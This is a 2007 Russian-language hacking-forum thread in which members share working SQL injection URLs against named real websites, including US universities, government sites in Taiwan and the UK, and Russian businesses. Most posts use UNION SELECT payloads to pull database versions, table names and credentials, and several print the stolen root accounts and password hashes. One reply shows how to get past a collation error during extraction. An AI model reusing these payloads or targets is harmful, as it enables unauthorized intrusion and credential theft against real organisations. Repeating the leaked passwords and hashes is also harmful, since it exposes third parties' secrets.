ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2521  
Старый 16.06.2007, 16:51
Аватар для Ky3bMu4
Ky3bMu4
Постоянный
Регистрация: 03.02.2007
Сообщений: 520
Провел на форуме:
1777536

Репутация: 932


Отправить сообщение для Ky3bMu4 с помощью ICQ
По умолчанию

yahoo - рулез!
yahoo`ярю! (с)
Всё - .edu !
Код:
http://www.skio.peachnet.edu/resources/library/serials.php?action=view&print=1&id=-57+union+select+version(),user()/* 
http://www.ksg.harvard.edu/iop/students_internships_db.php?action=id&id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* - PR 8  

http://journalism.berkeley.edu/events/details.php?ID=-322+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
http://alliance.la.asu.edu/azga/lp_view.php?lesson_id=-390+union+select+version()/* - в самом низу
http://www.loyno.edu/civildiscourse/journal.php?action=article_view&topic_id=4&article_id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+mysql.user/*
У многих есть доступ к таблице user, PR от 4 до 8. Разбирайте!

Спасибо огромное Isis!!! Сладенькое:
http://www.library.vcu.edu/ - PR 6

Код:
http://www.library.vcu.edu/whatsnew/news_result.cfm?ID=-744+union+select+1,2,convert(concat_ws(0x3b,password,user)using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mysql.user
User: root
Password: 3f378de07c02b3c4


P.S.
Эээ... а что означает вывод:
Цитата:
General error: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
???

Последний раз редактировалось Ky3bMu4; 16.06.2007 в 17:19..
 
Ответить с цитированием

  #2522  
Старый 16.06.2007, 17:08
Аватар для Isis
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Цитата:
P.S.
Эээ... а что означает вывод:
Цитата:
General error: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Это означает что вывод нужен в кодировке latin1
Код:
convert(concat_ws(0x3b,version(),user(),database()) using latin1)
 
Ответить с цитированием

  #2523  
Старый 16.06.2007, 20:04
Аватар для genom--
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091

Репутация: 1686


По умолчанию

http://www.autosave-scotland.co.uk/%20shop/choose_model.php?manID='
www.qmul.ac.uk/courses/department.php?dept_id='
www.wilkinson-sword.co.uk/index.php?id='
 
Ответить с цитированием

  #2524  
Старый 16.06.2007, 21:39
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
По умолчанию

Цитата:
random
http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,version(),3,4,5,6/*
http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,concat_ws(0x203a20,aID,aName,aPa ss,aEmail),3,4,5,6+from+tutvsesv_tvs.tvs_auth+limi t+0,1/*
 
Ответить с цитированием

  #2525  
Старый 16.06.2007, 22:54
Аватар для hitex
hitex
Новичок
Регистрация: 25.05.2007
Сообщений: 16
Провел на форуме:
80474

Репутация: 26
По умолчанию

Код:
http://ts.motronline.com/login.php?detail='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x203a20,admin_id,admin_pass),14,15,16,17,18,19,20,21,22,23+from+gllcts2_admin+limit+0,50/*
http://www.bridgewater.edu/index.php?id=-857+union+select+1,2,3,4,5,6,7,aes_decrypt(aes_encrypt(concat_ws(0x3a,id,username,password),31337),31337),9,10,11,12,13,14,15,16,17,18,19,20+from+users+limit+17,3/*
 
Ответить с цитированием

  #2526  
Старый 17.06.2007, 01:26
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.technepress.nl/publications.php?id=-19+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
=)
 
Ответить с цитированием

  #2527  
Старый 17.06.2007, 01:40
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

http://www.ciritas.ru/product.php?id=-10+union+select+1,2,id,4,name,6,7,8,9+from+client/*
 
Ответить с цитированием

  #2528  
Старый 17.06.2007, 01:42
Аватар для maxster
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

.gov

Код:
http://iff.immigration.gov.tw/enfront/lifep.php?tr_id=2&id=-111+UNION+SELECT+1,2,3,concat_ws(0x3a,user,password),5+from+mysql.user/*
MySQL

root:admin

Код:
http://www.colerainebc.gov.uk/show.php?id=-1111+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11+from+mysql.user/*
root:47bccb536d8ad7ee

Последний раз редактировалось maxster; 17.06.2007 в 01:45..
 
Ответить с цитированием

  #2529  
Старый 17.06.2007, 02:34
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

Код:
http://fuckthedrugs.net/groups/stream.php?memo_id=12+UNION+SELECT+1,username,3,4,password,6,7,8+FROM+mysql.users/*
root:58ac58431c5a1a5e
__________________
 
Ответить с цитированием

  #2530  
Старый 17.06.2007, 15:12
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

http://www.happyland-drink.ru/brands.php?id=-2+union+select+1,concat(id,char(58),password,char( 58),user,char(58),email,char(58),phone),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5+from+partners+limit+321,1/*

http://www.westlinegroup.ru/index.php?id=-182+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,1 2,13/*

http://www.mediasoyuz.ru/news/index.php?id=-712+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,1 2/*

http://www.moiki.net/articles.php?id=-16+union+select+VERSION(),2/*

http://bannerinter.com/index.php?id=2+union+select+1,2,table_name,4+from+ INFORMATION_SCHEMA.TABLES/*

http://www.ukrprint.com/job/show_message.php?id=-1820+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21/*

http://www.hosser.ru/index204.php?id=-379+UNION+SELECT+1,2,3,4,VERSION(),6,7,8,9+from+cl ients/*

http://www.pr.kg/or/detail.php?id=-231+UNION+SELECT+1,2,3,4,5,concat(id,0x3a,name,0x3 a,pass,0x3a,email),7,8+from+users/*

Последний раз редактировалось SWAT; 17.06.2007 в 16:31..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ